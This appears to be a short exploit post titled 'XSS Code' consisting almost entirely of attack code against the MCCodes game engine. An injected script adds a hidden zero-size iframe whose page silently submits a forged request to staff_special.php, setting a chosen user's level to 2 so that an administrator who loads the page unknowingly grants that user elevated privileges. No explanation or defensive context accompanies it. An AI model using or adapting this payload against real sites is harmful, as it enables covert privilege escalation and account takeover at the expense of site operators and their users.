XSS Code:
<script language="javascript" type="text/javascript">
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "iframe.html");
ifrm.style.width = 0+"px";
ifrm.style.height = 0+"px";
ifrm.style.border = 0+"px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
</script>
iframe.html
<HTML>
<HEAD>
<TITLE>test</TITLE>
</HEAD>
<script language="javascript" type="text/javascript">
var form = document.createElement("form");
form.setAttribute("method", 'get');
form.setAttribute("action", 'http://website.com/mccodes/staff_special.php');
var params= new Array()
params["action"]="userlevel";
params["ID"]="2";
params["level"]="2";
for(var key in params)
{
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", params[key]);
form.appendChild(hiddenField);
}
//document.body.appendChild(form); //needed for some browsers...
form.submit();
</script>
<BODY>
</BODY>
</HTML>
0 Comments.